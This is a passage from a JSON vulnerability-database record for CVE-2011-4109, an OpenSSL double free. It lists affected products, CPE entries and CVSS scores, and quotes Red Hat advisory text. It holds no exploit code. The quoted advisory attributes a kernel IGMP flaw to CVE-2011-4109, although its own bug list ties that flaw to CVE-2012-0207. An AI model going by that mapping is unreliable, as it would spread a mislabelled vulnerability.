"version": "11.3" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.1.2" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "11.10" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2" }, { "model": "big-ip apm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "aura session manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "big-ip analytics hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "xiv storage system gen3 mtm", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2810-11411.1.1" }, { "model": "reflection sp1", "scope": "eq", "trust": 0.3, "vendor": "attachmate", "version": "14.1" }, { "model": "big-ip psm hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "big-ip asm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "enterprise linux server optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "aura application server sip core pb26", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "sterling connect:direct", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.6" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.0" }, { "model": "big-ip webaccelerator hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "xiv storage system gen3 mtm 11.1.0.a", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2812-114" }, { "model": "9.0-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "linux lts amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "8.04" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.6.8" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "xiv storage system gen3 mtm", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2810-11411" }, { "model": "sterling connect:direct", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.61" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.5" }, { "model": "linux lts powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "8.04" }, { "model": "enterprise virtualization hypervisor for rhel", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "60" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "linux enterprise sdk sp4", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "big-ip apm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "56002" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "76000" }, { "model": "voice portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1.1" }, { "model": "aura experience portal sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "tivoli netcool/system service monitor fp3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.1" }, { "model": "junos space r1.8", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "13.1" }, { "model": "big-ip analytics hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "informix genero", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.40" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0.00" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "big-ip asm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip ltm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "messaging storage server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "project openssl e", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "aura system platform sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "big-ip analytics hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "linux enterprise desktop sp1", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "aura sip enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.2" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.3" }, { "model": "reflection for unix and openvms", "scope": "eq", "trust": 0.3, "vendor": "attachmate", "version": "20080" }, { "model": "sterling connect:direct for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.0" }, { "model": "enterprise virtualization hypervisor for rhel", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "50" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "big-ip psm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "tivoli netcool/system service monitor fp1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "tivoli network manager fp3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.9" }, { "model": "jboss enterprise web server for windows", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "1.0.2" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0" }, { "model": "big-ip ltm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "tivoli netcool/system service monitor fp7", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "9.0-release", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip apm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip wom hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.4" }, { "model": "enterprise linux desktop optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "77100" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "hardware management console 7r7.1.0", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "xiv storage system gen3 mtm 11.0.1.a", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2812-114" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10500" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "linux", "scope": null, "trust": 0.3, "vendor": "gentoo", "version": null }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "big-ip analytics hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "77000" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.4" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "ip deskphone", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "96x16.3" }, { "model": "reflection", "scope": "eq", "trust": 0.3, "vendor": "attachmate", "version": "14.0" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.5" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.0" }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.2" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "11.04" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0.00" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "big-ip psm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "tivoli workload scheduler distributed fp04", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "enterprise linux desktop workstation client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "docucolor dc252", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "0" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.0.1" }, { "model": "aura application enablement services", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "tivoli netcool/omnibus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4" }, { "model": "ds8870", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "linux enterprise desktop sp4", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "big-ip pem hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "aura conferencing standard", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2" }, { "model": "esxi", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "4.0" }, { "model": "hardware management console 7r7.2.0 sp1", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.2" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "pfsense", "scope": "eq", "trust": 0.3, "vendor": "bsdperimeter", "version": "2.0.1" }, { "model": "messaging storage server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.2" }, { "model": "message networking", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "5.2.5" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.1" }, { "model": "system management homepage", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.1.1" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "big-ip psm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "messaging storage server sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "project openssl 1.0.0a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "xiv storage system gen3 mtm", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2812-11411" } ], "sources": [ { "db": "CERT/CC", "id": "VU#737740" }, { "db": "BID", "id": "51281" }, { "db": "NVD", "id": "CVE-2011-4109" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8r:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8q:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8n:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8p:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8o:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2011-4109" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Red Hat", "sources": [ { "db": "PACKETSTORM", "id": "116824" }, { "db": "PACKETSTORM", "id": "116826" }, { "db": "PACKETSTORM", "id": "110012" }, { "db": "PACKETSTORM", "id": "109055" } ], "trust": 0.4 }, "cve": "CVE-2011-4109", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.6, "impactScore": 10.0, "integrityImpact": "COMPLETE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULMON", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.6, "id": "CVE-2011-4109", "impactScore": 10.0, "integrityImpact": "COMPLETE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.1, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2011-4109", "trust": 1.0, "value": "HIGH" }, { "author": "VULMON", "id": "CVE-2011-4109", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2011-4109" }, { "db": "NVD", "id": "CVE-2011-4109" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Double free vulnerability in OpenSSL 0.9.8 before 0.9.8s, when X509_V_FLAG_POLICY_CHECK is enabled, allows remote attackers to have an unspecified impact by triggering failure of a policy check. Fiery Network Controllers for Xerox DocuColor 242/252/260 Printer/Copier use a vulnerable version of OpenSSL (0.9.8o). OpenSSL prone to multiple security vulnerabilities. \nAn attacker may leverage these issues to obtain sensitive information, cause a denial-of-service condition and perform unauthorized actions. \n\nMultiple numeric conversion errors, leading to a buffer overflow, were\nfound in the way OpenSSL parsed ASN.1 (Abstract Syntax Notation One) data\nfrom BIO (OpenSSL\u0027s I/O abstraction) inputs. Specially-crafted DER\n(Distinguished Encoding Rules) encoded data read from a file or other BIO\ninput could cause an application using the OpenSSL library to crash or,\npotentially, execute arbitrary code. \n\nWarning: Before applying this update, back up your JBoss Enterprise\nApplication Platform\u0027s \"server/[PROFILE]/deploy/\" directory, along with all\nother customized configuration files. \n\nAll users of JBoss Enterprise Application Platform 5.1.2 for Solaris and\nMicrosoft Windows as provided from the Red Hat Customer Portal are advised\nto apply this update. Solution:\n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). Before applying the update, back up your\nexisting JBoss Enterprise Application Platform installation (including all\napplications and configuration files). -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: rhev-hypervisor5 security and bug fix update\nAdvisory ID: RHSA-2012:0168-01\nProduct: Red Hat Enterprise Virtualization\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2012-0168.html\nIssue date: 2012-02-21\nCVE Names: CVE-2011-4109 CVE-2011-4576 CVE-2011-4619 \n CVE-2012-0029 CVE-2012-0207 \n=====================================================================\n\n1. Summary:\n\nAn updated rhev-hypervisor5 package that fixes several security issues and\nvarious bugs is now available. \n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRHEV Hypervisor for RHEL-5 - noarch\n\n3. Description:\n\nThe rhev-hypervisor5 package provides a Red Hat Enterprise Virtualization\nHypervisor ISO disk image. The Red Hat Enterprise Virtualization\nHypervisor is a dedicated Kernel-based Virtual Machine (KVM) hypervisor. \nIt includes everything necessary to run and manage virtual machines: A\nsubset of the Red Hat Enterprise Linux operating environment and the Red\nHat Enterprise Virtualization Agent. \n\nNote: Red Hat Enterprise Virtualization Hypervisor is only available for\nthe Intel 64 and AMD64 architectures with virtualization extensions. \n\nA heap overflow flaw was found in the way QEMU-KVM emulated the e1000\nnetwork interface card. A privileged guest user in a virtual machine whose\nnetwork interface is configured to use the e1000 emulated driver could use\nthis flaw to crash the host or, possibly, escalate their privileges on the\nhost. (CVE-2012-0029)\n\nA divide-by-zero flaw was found in the Linux kernel\u0027s igmp_heard_query()\nfunction. An attacker able to send certain IGMP (Internet Group Management\nProtocol) packets to a target system could use this flaw to cause a denial\nof service. (CVE-2011-4109)\n\nAn information leak flaw was found in the SSL 3.0 protocol implementation\nin OpenSSL. Incorrect initialization of SSL record padding bytes could\ncause an SSL client or server to send a limited amount of possibly\nsensitive data to its SSL peer via the encrypted connection. \n(CVE-2011-4576)\n\nIt was discovered that OpenSSL did not limit the number of TLS/SSL\nhandshake restarts required to support Server Gated Cryptography. A remote\nattacker could use this flaw to make a TLS/SSL server using OpenSSL consume\nan excessive amount of CPU by continuously restarting the handshake. \n(CVE-2011-4619)\n\nRed Hat would like to thank Nicolae Mogoreanu for reporting CVE-2012-0029,\nand Simon McVittie for reporting CVE-2012-0207. \n\nThis updated package provides updated components that include fixes for\nvarious security issues. These issues have no security impact on Red Hat\nEnterprise Virtualization Hypervisor itself, however. The security fixes\nincluded in this update address the following CVE numbers:\n\nCVE-2006-1168 and CVE-2011-2716 (busybox issues)\n\nCVE-2009-5029, CVE-2009-5064, CVE-2010-0830 and CVE-2011-1089 (glibc\nissues)\n\nCVE-2011-1083, CVE-2011-3638, CVE-2011-4086, CVE-2011-4127 and\nCVE-2012-0028 (kernel issues)\n\nCVE-2011-1526 (krb5 issue)\n\nCVE-2011-4347 (kvm issue)\n\nCVE-2010-4008, CVE-2011-0216, CVE-2011-2834, CVE-2011-3905, CVE-2011-3919\nand CVE-2011-1944 (libxml2 issues)\n\nCVE-2011-1749 (nfs-utils issue)\n\nCVE-2011-4108 (openssl issue)\n\nCVE-2011-0010 (sudo issue)\n\nCVE-2011-1675 and CVE-2011-1677 (util-linux issues)\n\nCVE-2010-0424 (vixie-cron issue)\n\nThis updated rhev-hypervisor5 package fixes various bugs. Documentation of\nthese changes will be available shortly in the Technical Notes document:\n\nhttps://docs.redhat.com/docs/en-US/Red_Hat_Enterprise_Virtualization_for_Servers/2.2/html/Technical_Notes/index.html\n\nUsers of Red Hat Enterprise Virtualization Hypervisor are advised to\nupgrade to this updated package, which fixes these issues. \n\n4. Solution:\n\nBefore applying this update, make sure all previously-released errata\nrelevant to your system have been applied. \n\nThis update is available via the Red Hat Network. Details on how to\nuse the Red Hat Network to apply this update are available at\nhttps://access.redhat.com/kb/docs/DOC-11259\n\n5. Bugs fixed (http://bugzilla.redhat.com/):\n\n606191 - after upgrade , reboot can\u0027t shut off network successfully and back to firstboot menu again\n627538 - System will not boot sometimes when using rhevm to do upgrade twice. \n650179 - rhevm bridge came up instead of breth0 after fail to configure network\n675325 - Changes to networking always clear the contents of resolv.conf\n696875 - RHEVH bootup hanging in ovirt-early when doing LVM scanning\n717535 - [RFE] No confirm message for ntp server setting\n728895 - RHEV-H rpm should include a versions text file\n732948 - CCISS: Auto install fail at creating physical volume. \n734110 - rhevh - upgrade ovirt node fails due to nonexistent breth0\n734480 - [RFE] Add virt-who package to RHEVH\n734710 - Register RHN satellite will fail if RHN satellite password include space. \n740127 - Provide our CPE name in a new system file\n743938 - Make rhev-hypervisor RPM multi-installable like the kernel\n747519 - RHEV-H 5.8 register to RHN will fail. \n747647 - Change rhev-hypervisor RPM to be rhev-hypervisor5 to allow coinstallations with rhev-hypervisor6\n756178 - remove redundant brcm-iscsi.log rotation from ovirt-node now that it is in iscsi-initiator-utils\n758465 - RHEV-H 5.8 register to RHN will fail if password contains quotes or spaces\n759462 - Can not retrieve running guests UUID in RHEVH node. \n759632 - virt-who debugging output going to stderr always\n759635 - Revert workaround of virt-who output\n761357 - Multipathd service is stopped by default cause change password failed in single mode. \n768256 - network layout is incorrect when configure network with nic up\n771771 - CVE-2011-4109 openssl: double-free in policy checks\n771775 - CVE-2011-4576 openssl: uninitialized SSL 3.0 padding\n771780 - CVE-2011-4619 openssl: SGC restart DoS attack\n772075 - CVE-2012-0029 qemu-kvm: e1000: process_tx_desc legacy mode packets heap overflow\n772867 - CVE-2012-0207 kernel: igmp: Avoid zero delay when receiving odd mixture of IGMP queries\n783625 - The setup command should only allow password setting and viewing logs in single mode. \n\n6. Package List:\n\nRHEV Hypervisor for RHEL-5:\n\nnoarch:\nrhev-hypervisor5-5.8-20120202.0.el5.noarch.rpm\nrhev-hypervisor5-tools-5.8-20120202.0.el5.noarch.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and \ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/#package\n\n7. References:\n\nhttps://www.redhat.com/security/data/cve/CVE-2011-4109.html\nhttps://www.redhat.com/security/data/cve/CVE-2011-4576.html\nhttps://www.redhat.com/security/data/cve/CVE-2011-4619.html\nhttps://www.redhat.com/security/data/cve/CVE-2012-0029.html\nhttps://www.redhat.com/security/data/cve/CVE-2012-0207.html\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://docs.redhat.com/docs/en-US/Red_Hat_Enterprise_Virtualization_for_Servers/2.2/html/Technical_Notes/index.html\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2012 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.4 